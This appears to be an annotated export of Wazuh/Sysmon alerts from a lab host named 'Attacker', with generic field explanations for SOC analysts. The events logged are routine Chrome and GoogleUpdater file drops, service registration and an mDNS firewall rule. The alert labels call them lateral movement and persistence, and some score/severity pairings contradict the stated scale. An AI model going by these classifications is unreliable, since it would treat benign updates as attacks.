data.win.eventdata.image:  C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\Google10268_165626352\\bin\\uninstall.cmd
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:40:59.072
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:14.164+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:14.164+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534054.589514
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:59.0805033Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225099
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:40:59.074 ProcessGuid: {94294ddc-50aa-6804-b308-000000000e00} ProcessId: 10268 Image: C:\WINDOWS\SystemTemp\chrome_Unpacker_BeginUnzipping12284_1175179416\UpdaterSetup.exe TargetFilename: C:\Windows\SystemTemp\Google10268_165626352\bin\updater.exe CreationUtcTime: 2025-04-20 01:40:59.074 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:59.074
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50aa-6804-b308-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10268
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_1175179416\\UpdaterSetup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\Google10268_165626352\\bin\\updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:40:59.074
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  6
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:14.456+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:14.456+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath binary is: \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534054.592308
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:59.3171080Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225118
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:40:59.311 ProcessGuid: {94294ddc-ea7f-67fe-0b00-000000000e00} ProcessId: 772 Image: C:\WINDOWS\system32\services.exe TargetObject: HKLM\System\CurrentControlSet\Services\GoogleUpdaterInternalService137.0.7129.0\ImagePath Details: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7129.0\updater.exe" --system --windows-service --service=update-internal User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:40:59.311
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea7f-67fe-0b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\GoogleUpdaterInternalService137.0.7129.0\\ImagePath
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  \"C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7129.0\\updater.exe\" --system --windows-service --service=update-internal
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:17.160+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:17.160+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534057.595757
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:01.6661763Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225394
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:41:01.664 ProcessGuid: {94294ddc-50a3-6804-9f08-000000000e00} ProcessId: 12284 Image: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\135.0.7049.96_135.0.7049.86_chrome_updater.exe CreationUtcTime: 2025-04-20 01:41:01.664 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:01.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50a3-6804-9f08-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files (x86)\\Google\\GoogleUpdater\\137.0.7115.0\\updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\135.0.7049.96_135.0.7049.86_chrome_updater.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:41:01.664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:34:17.594+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:17.594+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534057.598703
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:01.9448813Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225427
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:41:01.943 ProcessGuid: {94294ddc-50ad-6804-ba08-000000000e00} ProcessId: 13184 Image: C:\Program Files\Google\Chrome\Application\135.0.7049.86\Installer\setup.exe TargetFilename: C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping12284_132767381\CR_72F4F.tmp\setup.exe CreationUtcTime: 2025-04-20 01:41:01.943 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:01.943
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-50ad-6804-ba08-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13184
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Program Files\\Google\\Chrome\\Application\\135.0.7049.86\\Installer\\setup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\chrome_Unpacker_BeginUnzipping12284_132767381\\CR_72F4F.tmp\\setup.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:41:01.943
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🧠 What happened? Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:34:21.750+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:34:21.750+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213} binary is: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92307
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid13_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534061.601600
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  13
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  13
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:13.3160671Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  225933
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Registry value set: RuleName: - EventType: SetValue UtcTime: 2025-04-20 01:41:13.315 ProcessGuid: {94294ddc-ea86-67fe-3b00-000000000e00} ProcessId: 2892 Image: C:\WINDOWS\system32\svchost.exe TargetObject: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B64D6AD1-CF9C-428B-9611-31035EE40213} Details: v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\Program Files\Google\Chrome\Application\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome| User: NT AUTHORITY\LOCAL SERVICE"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.eventType:  SetValue
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:41:13.315
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-ea86-67fe-3b00-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\system32\\svchost.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetObject:  HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{B64D6AD1-CF9C-428B-9611-31035EE40213}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.details:  v2.33|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=5353|App=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|Name=61e01718-4bf4-485e-95ad-06cc84518a3a|Desc=Inbound rule for Google Chrome to allow mDNS traffic.|EmbedCtxt=Google Chrome|
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\LOCAL SERVICE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

